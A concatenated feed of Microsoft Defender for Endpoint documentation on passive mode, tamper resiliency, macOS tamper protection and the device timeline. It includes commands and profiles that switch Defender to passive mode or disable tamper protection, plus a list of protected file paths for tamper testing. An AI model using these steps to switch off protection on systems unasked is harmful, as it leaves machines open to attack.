-On Windows Server 2022, Windows Server 2019, Windows Server, version 1803 or newer, Windows Server 2016, or Windows Server 2012 R2, you must set Microsoft Defender Antivirus to passive mode manually. This action helps prevent problems caused by having multiple antivirus products installed on a server. You can set Microsoft Defender Antivirus to passive mode using PowerShell, Group Policy, or a registry key.
-
-You can set Microsoft Defender Antivirus to passive mode by setting the following registry key:
-
-Path: `HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection`
-
-Name: `ForceDefenderPassiveMode`
-
-Type: `REG_DWORD`
-
-Value: `1`
-
-> [!NOTE]
-> For passive mode to work on endpoints running Windows Server 2016 and Windows Server 2012 R2, those endpoints must be onboarded using the instructions in [Onboard Windows servers](configure-server-endpoints.md#windows-server-2012-r2-and-windows-server-2016).
-
-For more information, see [Microsoft Defender Antivirus in Windows](microsoft-defender-antivirus-windows.md).
-
-## Microsoft Defender Antivirus seems to be stuck in passive mode
-
-If Microsoft Defender Antivirus is stuck in passive mode, set it to active mode manually by following these steps:
-
-1. On your Windows device, open Registry Editor as an administrator.
-
-2. Go to `Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection`.
-
-3. Set or define a **REG_DWORD** entry called `ForceDefenderPassiveMode`, and set its value to `0`.
-
-4. Reboot the device.
-
-> [!IMPORTANT]
-> If you're still having trouble setting Microsoft Defender Antivirus to active mode after following this procedure, [contact support](../../admin/get-help-support.md).
-
-## I am having trouble re-enabling Microsoft Defender Antivirus on Windows Server 2016
-
-If you are using a non-Microsoft antivirus/antimalware solution on Windows Server 2016, your existing solution might have required Microsoft Defender Antivirus to be disabled or uninstalled. You can use the [Malware Protection Command-Line Utility](command-line-arguments-microsoft-defender-antivirus.md) to re-enable Microsoft Defender Antivirus on Windows Server 2016.
-
-1. As a local administrator on the server, open Command Prompt.
-
-2. Run the following command: `MpCmdRun.exe -wdenable`
-
-3. Restart the device.
-
-## See also
--- [Microsoft Defender Antivirus compatibility with other security products](microsoft-defender-antivirus-compatibility.md)--- [Onboarding tools and methods for Windows devices in Defender for Endpoint](configure-endpoints.md)
security Tamper Resiliency https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/tamper-resiliency.md
- Title: Tamper resiliency with Microsoft Defender for Endpoint
-description: Learn about the anti-tampering capabilities of Microsoft Defender for Endpoint.
------ Previously updated : 07/04/2023---- tier1-- highpri-- mde-ngp--
-# Protect your organization from the effects of tampering
-
-Tampering is the general term used to describe attackers attempts to impair the effectiveness of Microsoft Defender for Endpoint. The ultimate goal of attackers isn't to affect just one device, but rather to achieve their objective such as launching a ransomware attack. As such, the anti-tampering capabilities of Microsoft Defender for Endpoint extend beyond preventing tampering of a single device to detecting attacks and minimizing their impact.
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](/microsoft-365/security/defender/microsoft-365-defender)-- [Microsoft Defender for Business](/microsoft-365/security/defender-business/mdb-overview)-
-## Organization wide tamper resiliency is built on Zero Trust
-
-The foundation for defending against tampering is following a [Zero Trust](/windows/security/zero-trust-windows-device-health) model.
--- Follow the best practice of least privilege. See [Access control overview for Windows](/windows/security/identity-protection/access-control/access-control).-- Configure [Conditional Access policies](/azure/active-directory/conditional-access/overview) to keep untrusted users and devices isolated.-
-In order to provide an effective defense against tampering, devices must be healthy.
--- [Onboard devices to Defender for Endpoint](/microsoft-365/security/defender-endpoint/onboard-configure).-- Make sure [security intelligence and antivirus updates](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-updates) are installed.-- Managed devices centrally, such as by [Microsoft Intune](/mem/intune/protect/advanced-threat-protection-configure), [Microsoft Defender for Endpoint Security Configuration Management](/mem/intune/protect/mde-security-integration), or [Configuration Manager](/mem/configmgr/protect/deploy-use/endpoint-protection-configure).-
-> [!NOTE]
-> On Windows devices, Microsoft Defender Antivirus can be managed by using Group Policy, Windows Management Instrumentation (WMI), and PowerShell cmdlets. However, those methods are more susceptible to tampering than by using Microsoft Intune, Configuration Manager, or Microsoft Defender for Endpoint Security Configuration Management.
-> If you're using Group Policy, we recommend [disabling local overrides for Microsoft Defender Antivirus settings](/microsoft-365/security/defender-endpoint/configure-local-policy-overrides-microsoft-defender-antivirus#configure-local-overrides-for-microsoft-defender-antivirus-settings) and [disabling local list merging](/microsoft-365/security/defender-endpoint/configure-local-policy-overrides-microsoft-defender-antivirus#configure-how-locally-and-globally-defined-threat-remediation-and-exclusions-lists-are-merged).
-
-You can view health status for [Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/device-health-microsoft-defender-antivirus-health) health and [sensors](/microsoft-365/security/defender-endpoint/device-health-sensor-health-os) in the [device health reports in Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/device-health-reports).
-
-## Preventing tampering on a single device
-
-Attackers use various tampering techniques to disable Microsoft Defender for Endpoint on a single device. These techniques are prevented differently on different operating systems.
-
-| Control | OS | Technique Families |
-| || |
-| [Tamper protection](/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection) | Windows | - Terminating/suspending processes<br/>- Stopping/pausing/suspending services<br/>- Modifying registry settings including exclusions<br/>- Manipulating/hijacking DLLs<br/>- Manipulation/modification of the file system<br/>- Agent integrity |
-| [Tamper protection](/microsoft-365/security/defender-endpoint/tamperprotection-macos) | Mac | - Terminating/suspending processes<br/>- Manipulation/modification of the file system<br/>- Agent integrity|
-| [Attack surface reduction rules](attack-surface-reduction.md) | Windows | Kernel drivers (see [Block abuse of exploited vulnerable signed drivers](/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-abuse-of-exploited-vulnerable-signed-drivers))|
-| [Windows Defender Application Control](/windows/security/threat-protection/windows-defender-application-control/windows-defender-application-control-operational-guide) (WDAC) | Windows | Kernel drivers (see [Microsoft vulnerable driver blocklist](/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules))|
--
-## Understanding the different ways to prevent driver based tampering on Windows
-
-One of the most common tampering techniques is to use a vulnerable driver to gain access to the kernel. This driver is often wrapped in an easy to deploy tool, but the underlying technique is the same.
-
-In order to prevent a driver based tampering on a single device, the device needs to be configured to block the loading of that driver before the attack.
-
-Microsoft provides several ways to keep devices well protected and up to date against driver based tampering.
-
-### Broadest protection - Microsoft vulnerable driver blocklist
-
-The blocklist is updated with each new major release of Windows, typically 1-2 times per year. Microsoft will occasionally publish future updates through regular Windows servicing. With Windows 11 2022 update, the vulnerable driver blocklist is enabled by default for all devices, but requires either memory integrity (also known as hypervisor-protected code integrity or HVCI), Smart App Control, or S mode to be active.
-
-See [Microsoft vulnerable driver blocklist](/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules#microsoft-vulnerable-driver-blocklist).
-
-For devices that don't meet those requirements, this list of drivers can be blocked by using Windows Defender Application Control policy.
-
-See [Vulnerable Driver blocklist XML](/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules#microsoft-vulnerable-driver-blocklist).
--
-### Faster updates - Block exploited vulnerable and signed drivers ASR rule
-
-This list of drivers blocked by the exploited and vulnerable drivers get updated more frequently than the recommended drivers blocklist. ASR rules can run in audit mode first to ensure that there's no impact before applying the rule in block mode.
-
-See [Block abuse of exploited vulnerable signed drivers rule](/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-abuse-of-exploited-vulnerable-signed-drivers).
-
-### Block other drivers - Windows Defender Application Control (WDAC)
-
-Attackers might attempt to use drivers that aren't blocked by either the recommended driver blocklist or an ASR rule. In this case, customers can protect themselves by using [WDAC to create a policy to block](/windows/security/threat-protection/windows-defender-application-control/windows-defender-application-control-operational-guide)
-
-WDAC also provides an audit mode to help understand the impact of applying the policy in block mode to avoid accidentally impacting legitimate use.
-
-## Preventing tampering via Microsoft Defender Antivirus exclusions on Windows
-
-A common technique used by attackers is to make unauthorized changes to anti-virus exclusions. Tamper protection prevents such attacks from occurring when all of the following conditions are met:
--- The device is managed by Intune; and-- The device has [Disable Local Admin Merge enabled](/microsoft-365/security/defender-endpoint/configure-local-policy-overrides-microsoft-defender-antivirus#use-microsoft-intune-to-disable-local-list-merging).-
-For more information, see [Tamper protection for antivirus exclusions](/microsoft-365/security/defender-endpoint/manage-tamper-protection-intune#tamper-protection-for-antivirus-exclusions).
-
-Attackers can be preventing from discovering existing antivirus exclusions by enabling [HideExclusionsFromLocalAdmin](/windows/client-management/mdm/defender-csp#configurationhideexclusionsfromlocaladmins).
-
-<a name='detecting-potential-tampering-activity-in-the-microsoft-365-defender-portal'></a>
-
-## Detecting potential tampering activity in the Microsoft Defender portal
-
-When tampering is detected, an alert is raised. Some of the alert titles for tampering are:
--- Attempt to bypass Microsoft Defender for Endpoint client protection-- Attempt to stop Microsoft Defender for Endpoint sensor-- Attempt to tamper with Microsoft Defender on multiple devices-- Attempt to turn off Microsoft Defender Antivirus protection-- Defender detection bypass-- Driver-based tampering attempt blocked-- Image file execution options set for tampering purposes-- Microsoft Defender Antivirus protection turned off-- Microsoft Defender Antivirus tampering-- Modification attempt in Microsoft Defender Antivirus exclusion list-- Pending file operations mechanism abused for tampering purposes-- Possible Antimalware Scan Interface (AMSI) tampering-- Possible remote tampering-- Possible sensor tampering in memory-- Potential attempt to tamper with MDE via drivers-- Security software tampering-- Suspicious Microsoft Defender Antivirus exclusion-- Tamper protection bypass-- Tampering activity typical to ransomware attacks-- Tampering with Microsoft Defender for Endpoint sensor communication-- Tampering with Microsoft Defender for Endpoint sensor settings-- Tampering with the Microsoft Defender for Endpoint sensor--
-If the [Block abuse of exploited vulnerable signed drivers](/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-abuse-of-exploited-vulnerable-signed-drivers) attack surface reduction rule is triggered, the event is viewable in the [ASR Report](/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-report) and in [Advanced Hunting](/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-deployment-operationalize#asr-rules-advanced-hunting)
-
-If [Windows Defender Application Control](/windows/security/threat-protection/windows-defender-application-control/windows-defender-application-control-deployment-guide) (WDAC) is enabled, the [block and audit activity can be seen in Advanced Hunting](/windows/security/threat-protection/windows-defender-application-control/querying-application-control-events-centrally-using-advanced-hunting).
----
security Tamperprotection Macos https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/tamperprotection-macos.md
- Title: Protect macOS security settings with tamper protection
-description: Use tamper protection to prevent malicious apps from changing important macOS security settings.
------- m365-security-- tier3-- mde-macos-- Previously updated : 01/29/2024--
-# Protect macOS security settings with tamper protection
--
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-rbac-abovefoldlink)
-
-Tamper protection in macOS helps prevent unwanted changes to security settings from being made by unauthorized users. Tamper protection helps prevent unauthorized removal of Microsoft Defender for Endpoint on macOS. This capability also helps important security files, processes, and configuration settings from being tampered.
-
-> [!IMPORTANT]
-> Starting March of 2023, Microsoft Defender for Endpoint on macOS will start respecting the selection for tamper protection applied via the global tamper protection switch under advanced settings in the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)). You can choose to enforce (block/audit/disable) your own macOS tamper protection settings by using a Mobile Device Management (MDM) solution such as Intune or JAMF (recommended). If the tamper protection setting was not enforced via MDM, a local administrator can continue to manually change the setting with the following command: `sudo mdatp config tamper-protection enforcement-level --value (chosen mode)`.
-
-You can set Tamper Protection in the following modes:
-
-|Topic|Description|
-|||
-|Disabled|Tamper protection is completely off.|
-|Audit|Tampering operations are logged, but not blocked. This mode is the default after installation.|
-|Block|Tamper protection is on; tampering operations are blocked.|
-
-When tamper protection is set to audit or block mode, you can expect the following outcomes:
-
-**Audit mode**:
--- Actions to uninstall Defender for Endpoint agent is logged (audited)-- Editing/modification of Defender for Endpoint files are logged (audited)-- Creation of new files under Defender for Endpoint location is logged (audited)-- Deletion of Defender for Endpoint files is logged (audited)-- Renaming of Defender for Endpoint files is logged (audited)-
-**Block mode**:
--- Actions to uninstall Defender for Endpoint agent is blocked-- Editing/modification of Defender for Endpoint files are blocked-- Creation of new files under Defender for Endpoint location is blocked-- Deletion of Defender for Endpoint files is blocked-- Renaming of Defender for Endpoint files is blocked-- Commands to stop the agent (wdavdaemon) fail-
-Here's an example of a system message in response to a blocked action:
-
-![Screenshot of operation blocked message.](media/operation-blocked.png)
-
-You can configure the tamper protection mode by providing the mode name as enforcement-level.
-
-> [!NOTE]
->
-> - The mode change will apply immediately.
-> - If you used JAMF during the initial configuration, then you'll need to update the configuration using JAMF as well.
-
-## Before you begin
--- Supported macOS versions: Big Sur (11), or later.-- Minimum required version for Defender for Endpoint: 101.70.19.--
-**Highly recommended settings:**
--- System Integrity Protection (SIP) enabled. For more information, see [Disabling and Enabling System Integrity Protection](https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection).-- Use a Mobile device management (MDM) tool to configure Microsoft Defender for Endpoint.-- Ensure that Defender for Endpoint has **Full Disk Access** authorization.-
- > [!NOTE]
- > Both having SIP enabled and all configuration done via MDM is not mandatory, but required for a fully secured machine, as otherwise a local admin still can make tampering changes that macOS manages. For example, enabling **TCC** (Transparency, Consent & Control) through a Mobile Device Management solution such as [Intune](mac-install-with-intune.md), will eliminate the risk of a global admin revoking **Full Disk Access** Authorization by a local admin.
-
-## Configure Tamper Protection on macOS devices
-
-Microsoft Defender evaluates these settings in the following order.
-If a higher priority setting is configured, the rest are ignored:
-
-1) Managed configuration profile (tamperProtection/enforcementLevel setting):
- - [JAMF](#jamf)
- - [Intune](#intune)
-2) [Manual configuration](#manual-configuration) (with `mdatp config tamper-protection enforcement-level --value { disabled|audit|block }`)
-3) If Tamper Protection flag in Security Portal is set, the "block" mode is used (in Preview, not available to all customers)
-4) If machine is licensed, then "audit" mode is used by default
-5) If machine isn't licensed, then Tamper Protection is in the "block" mode
-
-### Before you begin
-
-Make sure that your machine is licensed and healthy (corresponding values report `true`):
-
-```bash
-mdatp health
-```
-
-```console
-healthy : true
-health_issues : []
-licensed : true
-...
-tamper_protection : "audit"
-```
-
-`tamper_protection` reports the effective enforcement level.
-
-### Manual configuration
-
-1. Use the following command to switch to the most restrictive mode:
-
-```console
-sudo mdatp config tamper-protection enforcement-level --value block
-```
-
-![Image of manual configuration command](medi.png)
-
-> [!NOTE]
-> You must use managed configuration profile (deployed via MDM) on production machines. If a local admin changed tamper protection mode via a manual configuration, they can change it to a less restrictive mode at any time as well. If tamper protection mode was set via a managed profile, only a global admin will be able to undo it.
-
-2. Verify the result.
-
-```console
-healthy : true
-health_issues : []
-licensed : true
-engine_version : "1.1.19300.3"
-app_version : "101.70.19"
-org_id : "..."
-log_level : "info"
-machine_guid : "..."
-release_ring : "InsiderFast"
-product_expiration : Dec 29, 2022 at 09:48:37 PM
-cloud_enabled : true
-cloud_automatic_sample_submission_consent : "safe"
-cloud_diagnostic_enabled : false
-passive_mode_enabled : false
-real_time_protection_enabled : true
-real_time_protection_available : true
-real_time_protection_subsystem : "endpoint_security_extension"
-network_events_subsystem : "network_filter_extension"
-device_control_enforcement_level : "audit"
-tamper_protection : "block"
-automatic_definition_update_enabled : true
-definitions_updated : Jul 06, 2022 at 01:57:03 PM
-definitions_updated_minutes_ago : 5
-definitions_version : "1.369.896.0"
-definitions_status : "up_to_date"
-edr_early_preview_enabled : "disabled"
-edr_device_tags : []
-edr_group_ids : ""
-edr_configuration_version : "20.199999.main.2022.07.05.02-ac10b0623fd381e28133debe14b39bb2dc5b61af"
-edr_machine_id : "..."
-conflicting_applications : []
-network_protection_status : "stopped"
-data_loss_prevention_status : "disabled"
-full_disk_access_enabled : true
-```
-
-Notice that the "tamper_protection" is now set to "block".
-
-### JAMF
-
-Configure tamper protection mode in Microsoft Defender for Endpoint [configuration profile](mac-jamfpro-policies.md), by adding the following settings:
-
-```xml
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
- <dict>
- <key>tamperProtection</key>
- <dict>
- <key>enforcementLevel</key>
- <string>block</string>
- </dict>
- </dict>
-</plist>
-```
-
-> [!NOTE]
-> If you already have a configuration profile for Microsoft Defender for Endpoint then you need to *add* settings to it. You should not create a second configuration profile.
-
-### Intune
-#### Settings catalog
-You can create a new settings catalog profile to add the Tamper protection configuration, or you can add it to an existing one. The setting "Enforcement level" can be found under category "Microsoft Defender" and subcategory "Tamper protection". Afterwards, choose the desired level.
-
-#### Custom profile
-As an alternative, you can also configure Tamper protection via a custom profile. For more information, see [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md).
-
-> [!NOTE]
-> For Intune configuration, you can create a new profile configuration file to add the Tamper protection configuration, or you can add these parameters to the existing one. Choose the desired level.
-
-```xml
-<?xml version="1.0" encoding="utf-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1">
- <dict>
- <key>PayloadUUID</key>
- <string>C4E6A782-0C8D-44AB-A025-EB893987A295</string>
- <key>PayloadType</key>
- <string>Configuration</string>
- <key>PayloadOrganization</key>
- <string>Microsoft</string>
- <key>PayloadIdentifier</key>
- <string>com.microsoft.wdav</string>
- <key>PayloadDisplayName</key>
- <string>Microsoft Defender for Endpoint settings</string>
- <key>PayloadDescription</key>
- <string>Microsoft Defender for Endpoint configuration settings</string>
- <key>PayloadVersion</key>
- <integer>1</integer>
- <key>PayloadEnabled</key>
- <true/>
- <key>PayloadRemovalDisallowed</key>
- <true/>
- <key>PayloadScope</key>
- <string>System</string>
- <key>PayloadContent</key>
- <array>
- <dict>
- <key>PayloadUUID</key>
- <string>99DBC2BC-3B3A-46A2-A413-C8F9BB9A7295</string>
- <key>PayloadType</key>
- <string>com.microsoft.wdav</string>
- <key>PayloadOrganization</key>
- <string>Microsoft</string>
- <key>PayloadIdentifier</key>
- <string>com.microsoft.wdav</string>
- <key>PayloadDisplayName</key>
- <string>Microsoft Defender for Endpoint configuration settings</string>
- <key>PayloadDescription</key>
- <string/>
- <key>PayloadVersion</key>
- <integer>1</integer>
- <key>PayloadEnabled</key>
- <true/>
- <key>tamperProtection</key>
- <dict>
- <key>enforcementLevel</key>
- <string>block</string>
- </dict>
- </dict>
- </array>
- </dict>
-</plist>
-```
-#### Check status
-Check the tamper protection status by running the following command:
-
-`mdatp health --field tamper_protection`
-
-The result shows "block" if tamper protection is on:
-
-![Image of tamper protection in block mode](media/tp-block-mode.png)
-
-You can also run full `mdatp health` and look for the "tamper_protection" in the output.
-
-For extended information on the tamper protection status, run `mdatp health --details tamper_protection`.
-
-## Verify tamper protection preventive capabilities
-
-You can verify that tamper protection is on through various ways.
-
-### Verify block mode
-
-Tampering alert is raised in the Microsoft Defender portal
--
-### Verify block mode and audit modes
--- Using Advanced hunting, you see tampering alerts appear-- Tampering events can be found in the local device logs: `sudo grep -F '[{tamperProtection}]' /Library/Logs/Microsoft/mdatp/microsoft_defender_core.log`-
-![Screenshot of tamper protection log.](media/tamper-protection-log.png)
-
-### DIY scenarios
--- With tamper protection set to "block", attempt different methods to uninstall Defender for Endpoint. For example, drag the app tile into trash or uninstall tamper protection using the command line.-- Try to stop the Defender for Endpoint process (kill).-- Try to delete, rename, modify, move Defender for Endpoint files (similar to what a malicious user would do), for example:-
- - /Applications/Microsoft Defender ATP.app/
- - /Library/LaunchDaemons/com.microsoft.fresno.plist
- - /Library/LaunchDaemons/com.microsoft.fresno.uninstall.plist
- - /Library/LaunchAgents/com.microsoft.wdav.tray.plist
- - /Library/Managed Preferences/com.microsoft.wdav.ext.plist
- - /Library/Managed Preferences/mdatp_managed.json
- - /Library/Managed Preferences/com.microsoft.wdav.atp.plist
- - /Library/Managed Preferences/com.microsoft.wdav.atp.offboarding.plist
- - /usr/local/bin/mdatp
-
-## Turning off Tamper Protection
-
-You can turn off Tamper Protection using any of the following methods.
-
-### Manual configuration
-
-Use the following command:
-
-```console
-sudo mdatp config tamper-protection enforcement-level --value disabled
-```
-
-## JAMF
-Change the `enforcementLevel` value to "disabled" [in your configuration profile](mac-preferences.md#tamper-protection), and push it to the machine:
-
-```console
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
- <dict>
- <key>tamperProtection</key>
- <dict>
- <key>enforcementLevel</key>
- <string>disabled</string>
- </dict>
- </dict>
-</plist>
-```
-
-### Intune
-Add the following configuration in your Intune [profile](mac-preferences.md#tamper-protection):
-
-```XML
-<?xml version="1.0" encoding="utf-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1">
- <dict>
- <key>PayloadUUID</key>
- <string>C4E6A782-0C8D-44AB-A025-EB893987A295</string>
- <key>PayloadType</key>
- <string>Configuration</string>
- <key>PayloadOrganization</key>
- <string>Microsoft</string>
- <key>PayloadIdentifier</key>
- <string>com.microsoft.wdav</string>
- <key>PayloadDisplayName</key>
- <string>Microsoft Defender for Endpoint settings</string>
- <key>PayloadDescription</key>
- <string>Microsoft Defender for Endpoint configuration settings</string>
- <key>PayloadVersion</key>
- <integer>1</integer>
- <key>PayloadEnabled</key>
- <true/>
- <key>PayloadRemovalDisallowed</key>
- <true/>
- <key>PayloadScope</key>
- <string>System</string>
- <key>PayloadContent</key>
- <array>
- <dict>
- <key>PayloadUUID</key>
- <string>99DBC2BC-3B3A-46A2-A413-C8F9BB9A7295</string>
- <key>PayloadType</key>
- <string>com.microsoft.wdav</string>
- <key>PayloadOrganization</key>
- <string>Microsoft</string>
- <key>PayloadIdentifier</key>
- <string>com.microsoft.wdav</string>
- <key>PayloadDisplayName</key>
- <string>Microsoft Defender for Endpoint configuration settings</string>
- <key>PayloadDescription</key>
- <string/>
- <key>PayloadVersion</key>
- <integer>1</integer>
- <key>PayloadEnabled</key>
- <true/>
- <key>tamperProtection</key>
- <dict>
- <key>enforcementLevel</key>
- <string>disabled</string>
- </dict>
- </dict>
- </array>
- </dict>
-</plist>
-```
-
-## Exclusions
-
-> [!NOTE]
-> Available in version 101.98.71 or newer.
-
-Tamper Protection prevents any macOS process from making changes to Microsoft Defender's assets or killing Microsoft Defender's processes.
-Protected assets include installation and configuration files.
-
-Internally, Microsoft Defender makes exceptions to certain macOS processes, under certain circumstances.
-As an example, macOS can upgrade Defender's package, if Tamper Protection verifies the packages authenticity.
-There are other exclusions as well.
-For example, macOS MDM process can replace Microsoft's Defender's managed configuration files.
-
-There are situations when a global administrator needs to restart Defender on all or some managed machines.
-Typically it's done by creating and running a JAMF's policy that runs a script on remote machines (or similar operations for other MDM vendors.)
-
-In order to avoid marking those policy-initiated operations, Microsoft Defender detects those MDM policy processes for JAMF and Intune,
-and permit tampering operations from them.
-At the same time, Tamper Protection will block the same script from restarting Microsoft Defender, if it is started from a Terminal locally.
-
-However, those policy running processes are vendor specific.
-While Microsoft Defender provides built-in exclusions for JAMF and Intune, it can't provide those exclusions for all possible MDM vendors.
-Instead, a global administrator can add their own exclusions to Tamper Protection.
-Exclusions can be done only through MDM profile, not local configuration.
-
-To do that, you need to first figure out the path to the MDM helper process that runs policies. You can do it either by following the MDM vendor's documentation.
-You can also initiate tampering with a test policy, get an alert in the Security Portal, inspect the hierarchy of processes that initiated the "attack", and pick the process that looks like an MDM helper candidate.
-
-Once the process path is identified, you have few choices on how to configure an exclusion:
--- By the path itself. It's the simplest (you already have this path) and the least secure way to do it, in other words, not recommended.-- By getting the signing ID from the executable, either TeamIdentifier or signing Identifier, by running `codesign -dv --verbose=4 path_to_helper` (look for Identifier and TeamIdentifier, the latter isn't available for Apple's own tools.)-- Or by using a combination of those attributes.-
-Example:
-
-```bash
-codesign -dv --verbose=4 /usr/bin/ruby
-```
-
-```console
-Executable=/usr/bin/ruby
-Identifier=com.apple.ruby
-Format=Mach-O universal (x86_64 arm64e)
-CodeDirectory v=20400 size=583 flags=0x0(none) hashes=13+2 location=embedded
-Platform identifier=14
-VersionPlatform=1
-VersionMin=852992
-VersionSDK=852992
-Hash type=sha256 size=32
-CandidateCDHash sha256=335c10d40db9417d80db87f658f6565018a4c3d6
-CandidateCDHashFull sha256=335c10d40db9417d80db87f658f6565018a4c3d65ea3b850fc76c59e0e137e20
-Hash choices=sha256
-CMSDigest=335c10d40db9417d80db87f658f6565018a4c3d65ea3b850fc76c59e0e137e20
-CMSDigestType=2
-Executable Segment base=0
-Executable Segment limit=16384
-Executable Segment flags=0x1
-Page size=4096
-Launch Constraints:
- None
-CDHash=335c10d40db9417d80db87f658f6565018a4c3d6
-Signature size=4442
-Authority=Software Signing
-Authority=Apple Code Signing Certification Authority
-Authority=Apple Root CA
-Signed Time=Apr 15, 2023 at 4:45:52 AM
-Info.plist=not bound
-TeamIdentifier=not set
-Sealed Resources=none
-Internal requirements count=1 size=64
-```
-
-Configure [preferences](mac-preferences.md#exclusions), for example for JAMF:
-
-```xml
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
- <dict>
- <key>tamperProtection</key>
- <dict>
- <key>enforcementLevel</key>
- <string>block</string>
- <key>exclusions</key>
- <array>
- <dict>
- <key>path</key>
- <string>/usr/bin/ruby</string>
- <key>teamId</key>
- <string/>
- <key>signingId</key>
- <string>com.apple.ruby</string>
- <key>args</key>
- <array>
- <string>/usr/local/bin/global_mdatp_restarted.rb</string>
- </array>
- </dict>
- </array>
- </dict>
- </dict>
-</plist>
-```
-
-Note, that excluding a scripting interpreter (like Ruby from the example above) instead of a compiled executable isn't secure, as it can run *any script*, not just the one that a global admin uses.
-
-To minimize the risk, we recommend using extra `args` to allow only specific scripts to run with scripting interpreters.
-In the example above, only `/usr/bin/ruby /usr/local/bin/global_mdatp_restarted.rb` is permitted to restart Defender.
-But, for example, `/usr/bin/ruby /Library/Application Support/Global Manager/global_mdatp_restarted.rb` or even `/usr/bin/ruby /usr/local/bin/global_mdatp_restarted.rb $USER` aren't allowed.
-
-> [!WARNING]
-> Always use the most restrictive criteria to prevent unexpected attacks!
-
-## Troubleshooting configuration issues
-
-### Issue: Tamper protection is reported as disabled
-
-If running the command `mdatp health` reports that the tamper protection is disabled, even if you enabled it and more than an hour has passed since the onboarding, then you can check if you have the right configuration by running the following command:
-
-```bash
-mdatp health --details tamper_protection
-```
-
-```console
-tamper_protection : "audit"
-exclusions : [{"path":"/usr/bin/ruby","team_id":"","signing_id":"com.apple.ruby","args":["/usr/local/bin/global_mdatp_restarted.rb"]}] [managed]
-feature_enabled_protection : true
-feature_enabled_portal : true
-configuration_source : "local"
-configuration_local : "audit"
-configuration_portal : "block"
-configuration_default : "audit"
-configuration_is_managed : false
-```
--- `tamper_protection` is the *effective* mode. If this mode is the mode you intended to use, then you're all set.-- `configuration_source` indicates how Tamper Protection enforcement level is set. It must match how you configured tamper protection. (If you set its mode through a managed profile, and `configuration_source` shows something different, then you most probably misconfigured your profile.)
- - `mdm` - it's configured through a managed profile. Only a global admin can change it with an update to the profile!
- - `local` - it's configured with `mdatp config` command
- - `portal` - default enforcement level set in Security Portal
- - `defaults` - not configured, the default mode is used
-- If `feature_enabled_protection` is false, then Tamper Protection isn't enabled for your organization (it happens if Defender doesn't report 'licensed')-- If `feature_enabled_portal` is false, then setting default mode via Security Portal isn't enabled for you yet.-- `configuration_local`, `configuration_portal`, `configuration_default` tells the mode that would be used, *if the corresponding configuration channel was used*. (As an example, you can configure Tamper Protection to the "block" mode via an MDM profile, and `configuration_default` tells you `audit`. It only means that *if you remove* your profile, and the mode wasn't set with `mdatp config` or through Security Portal, then it uses the default mode, which is `audit`.)-
-> [!NOTE]
-> You need to inspect Microsoft Defender's logs to get the same information prior to version 101.98.71. See below for an example.
-
-```console
-$ sudo grep -F '[{tamperProtection}]: Feature state:' /Library/Logs/Microsoft/mdatp/microsoft_defender_core.log | tail -n 1
-```
security Techniques Device Timeline https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/techniques-device-timeline.md
- Title: Techniques in the device timeline
-description: Understanding the device timeline in Microsoft Defender for Endpoint
------- m365-security-- tier2-- mde-edr-- Previously updated : 03/15/2021--
-# Techniques in the device timeline
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-You can gain more insight in an investigation by analyzing the events that happened on a specific device. First, select the device of interest from the [Devices list](machines-view-overview.md). On the device page, you can select the **Timeline** tab to view all the events that occurred on the device.
-
-## Understand techniques in the timeline
-
-> [!IMPORTANT]
-> Some information relates to a prereleased product feature in public preview which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
